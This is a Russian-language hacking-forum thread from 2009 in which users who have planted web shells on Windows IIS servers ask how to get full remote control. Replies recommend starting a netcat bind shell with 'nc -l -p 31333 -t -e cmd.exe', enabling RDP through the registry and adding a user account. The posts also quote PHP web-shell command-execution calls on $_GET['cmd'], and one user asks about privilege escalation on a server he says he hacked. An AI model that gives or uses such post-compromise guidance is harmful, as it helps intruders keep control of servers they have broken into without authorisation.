ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Root Windows
  #1  
Старый 28.10.2009, 21:37
Аватар для M@rtein
M@rtein
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме:
389103

Репутация: 15
Question Root Windows

Подскажите как происходит root виндовых серваков?
Залил шелл, стоит Microsoft IIS, операционка - Windows NT ABCD-SRV-01 5.2 build 3790
Как потом подключаться к такому серваку, по RDP?
Поиском пользовался, чето ничего не нашел.
Если где то обсуждалось, дайте ссылку пожалуйста.
 
Ответить с цитированием

  #2  
Старый 28.10.2009, 22:18
Аватар для $Atlet$
$Atlet$
Участник форума
Регистрация: 25.10.2008
Сообщений: 215
Провел на форуме:
2483773

Репутация: 78
Отправить сообщение для $Atlet$ с помощью ICQ
По умолчанию

С шелла имеешь доступ в системную директорию? Проверь открыт ли порт 3389.
 
Ответить с цитированием

  #3  
Старый 29.10.2009, 11:54
Аватар для M@rtein
M@rtein
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме:
389103

Репутация: 15
По умолчанию

Цитата:
C:\Documents and Settings\M@rtein>telnet xxx.xxx.xxx.xxx:3389
Подключение к xxx.xxx.xxx.xxx:3389...Не удалось открыть подключение к этому узлу, на порт 23: Сбой подключения
Доступ в системную директорию есть, а так же
Цитата:
Open base dir: OFF (not secure)
 
Ответить с цитированием

  #4  
Старый 30.10.2009, 22:00
Аватар для Silly.worm
Silly.worm
Познающий
Регистрация: 13.07.2009
Сообщений: 65
Провел на форуме:
507007

Репутация: 54
По умолчанию

M@rtein не получится у тебя так, пробуй через "mstsc".
(нужно набрать у себя на компе, пуск-->выполнить-->mstsc)
Если подключение пройдет то все ок и порт открыт. (попросит ввести логин и пароль)
 
Ответить с цитированием

  #5  
Старый 31.10.2009, 13:53
Аватар для M@rtein
M@rtein
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме:
389103

Репутация: 15
По умолчанию

Silly.worm
Цитата:
не удаеться подключиться к удаленному компьютеру
Что еще можно попробовать?
 
Ответить с цитированием

  #6  
Старый 02.11.2009, 08:30
Аватар для p.r0phe.t
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Цитата:
C:\Documents and Settings\M@rtein>telnet xxx.xxx.xxx.xxx:3389
Подключение к xxx.xxx.xxx.xxx:3389...Не удалось открыть подключение к этому узлу, на порт 23: Сбой подключения

Ты на телнет конектишься,синтаксис:
C:\Documents and Settings\M@rtein>telnet xxx.xxx.xxx.xxx 3389 (через пробел),но телнетом не выйдет к этому порту приконектиться,юзай виндовый клиент RDP.

Выполни команду netstat -a,глянь какие порты слушаются.
Залей неткат,выполни nc -l -p 31333 -t -e cmd.exe
конекться телнетом на этот порт.

И ещё почитай:
https://forum.antichat.ru/thread36042.html

Если порт RDP закрыт, по статье открой его в реестре,добавь юзера и радуйся.
Удачи.

Последний раз редактировалось p.r0phe.t; 02.11.2009 в 08:34..
 
Ответить с цитированием

Не работает выполнение команд
  #7  
Старый 02.11.2009, 21:04
Аватар для M@rtein
M@rtein
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме:
389103

Репутация: 15
Unhappy Не работает выполнение команд

Цитата:
exec($_GET["cmd"]);
popen($_GET["cmd"]);
exec($_GET["cmd"]);
passthru($_GET["cmd"]);
proc_open($_GET["cmd"]);
shell_exec($_GET["cmd"]);
pcntl_exec($_GET["cmd"]);
На данном этапе все упирается в то что не работают абсолютно команды....
 
Ответить с цитированием

  #8  
Старый 08.11.2009, 08:32
Аватар для _gr34t
_gr34t
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696

Репутация: 40
По умолчанию

да и у меня такая же проблема, хакнул сервак, стоит винда Windows NT XXX 5.2 build 3790

safe_mode=Off
disable_functions=Off
ComSpec=C:\WINDOWS\system32\cmd.exe
Доступ в C:\WINDOWS\ есть, файл system32\cmd.exe есть, проверял, но комманды не выполняются никак
 
Ответить с цитированием

  #9  
Старый 08.11.2009, 15:20
Аватар для _gr34t
_gr34t
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696

Репутация: 40
По умолчанию

Неужели никто не знает почему команды не выполняется??

Или подкиньте статью почитать про получение удалённого доступа на Win или повышение привилегий.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
История Windows (с картинками) GrinGoO Статьи 19 17.04.2010 13:01
Windows Vista Robin_Hood Мировые новости 18 09.03.2007 14:00
Помогите откомпилить!! LoFFi Уязвимости 19 19.03.2006 22:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ